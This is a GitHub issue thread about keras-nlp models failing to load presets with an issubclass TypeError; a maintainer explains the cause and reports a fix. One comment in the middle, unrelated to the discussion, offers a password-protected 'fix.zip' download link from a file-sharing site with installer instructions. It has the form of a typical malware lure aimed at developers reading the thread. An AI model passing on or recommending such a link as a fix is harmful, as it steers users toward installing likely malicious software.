### ISSUE TITLE
[keras-hub]Issue in running recently added models

### ISSUE THREAD

**Issue by cosmo3769** [keras-team/keras-nlp#1795]
When I am running the recently added models in keras-hub branch, I am getting an error.

```
import keras_nlp
import numpy as np
input_data = np.ones((2, 224, 224, 3), dtype="float32")

model = keras_nlp.models.ViTDetBackbone.from_preset("kaggle://keras/vitdet/keras/vitdet_base/2")
model(input_data)
```

```
Traceback (most recent call last):
  File "/Users/cosmo3769/projects/keras-nlp/test.py", line 64, in <module>
    model = keras_nlp.models.ViTDetBackbone.from_preset("kaggle://keras/vitdet/keras/vitdet_base/2")
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/cosmo3769/projects/keras-nlp/keras_nlp/src/models/backbone.py", line 212, in from_preset
    if not issubclass(preset_cls, cls):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: issubclass() arg 1 must be a class
```

**Note:** I am getting the same error in all the recently added models in keras-hub branch.

**Comment by cosmo3769** [comment]
Ohh, I think kaggle models need to update it's `config.json` (module & registered_name) and `metadata.json`.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hsuyab** [comment]
I think this error is coming up in one of the example codes as well. Here in the [getting started](https://keras.io/guides/keras_nlp/getting_started/) running `classifier = keras_nlp.models.BertClassifier.from_preset("bert_tiny_en_uncased_sst2")
` also gives the `TypeError: issubclass() arg 1 must be a class`.

**Comment by mattdangerw** [comment]
Thanks! See the error on `classifier = keras_nlp.models.BertClassifier.from_preset("bert_tiny_en_uncased_sst2")` taking a look.

**Comment by mattdangerw** [comment]
Ok! This should be now working as intende on master.

`classifier = keras_nlp.models.BertClassifier.from_preset("bert_tiny_en_uncased_sst2")` will work as expected.

`backbone = keras_nlp.models.ViTDetBackbone.from_preset("kaggle://keras/vitdet/keras/vitdet_base/2")` will thrown because we are attempting to revive a KerasCV model that is not available in the package. That is expected as well. But the error message will better.

For vit det (and other models we are adding to the hub) we will need to generate new kaggle assets before the model is ready for use. That's expected.
